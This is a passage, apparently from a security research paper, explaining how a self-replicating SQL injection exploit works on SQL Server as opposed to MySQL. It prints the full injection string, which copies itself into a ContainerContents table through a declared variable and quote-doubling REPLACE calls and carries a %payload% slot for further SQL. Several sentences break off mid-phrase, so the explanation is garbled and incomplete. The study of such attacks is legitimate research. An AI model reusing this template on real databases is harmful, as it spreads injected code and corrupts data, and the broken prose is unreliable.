The SQL Server exploit (Exploit
1) is functionally similar to the MySQL version. The
differences are explained below.
%content%' WHERE TagId='%id%';
DECLARE @a varchar(1024);
SET @a='UPDATE ContainerContents SET
TagId=''''%id%''''; DECLARE @a varchar(1024); SET
@a='''''' + REPLACE(@a, '''''''', '''''''''''') +
''''''; '' + @a; %payload%; --';
UPDATE ContainerContents SET
NewContents='%content%'' WHERE TagId=''%id%'';
DECLARE @a varchar(1024); SET @a=''' +
REPLACE(@a, '''', '''''') + '''; ' + @a;
Exploit 1 - SQL Server exploit.
Whitespace is for readability only.
Like MySQL, SQL Server supports variables. However, on
SQL Server variables must be declared before they are used.
This happens in the second line. The declaration is also
added to the last line, so it is copied to the database. It
is also stored in the variable, as this contains the last
MySQL uses a backslash to escape quotes in strings (\').
SQL Server uses two single quotes for this purpose.
MySQL provides the functions
QUOTE to concatenate strings and escape the
quotes in them.
SQL Server does not provide these functions, so the string
+ is used to
REPLACE function is used to escape
strings, by replacing each quote with two quotes. This
differs slightly from MySQL's
as that also encloses the string in quotes. To compensate
for this, the quotes are added explicitly.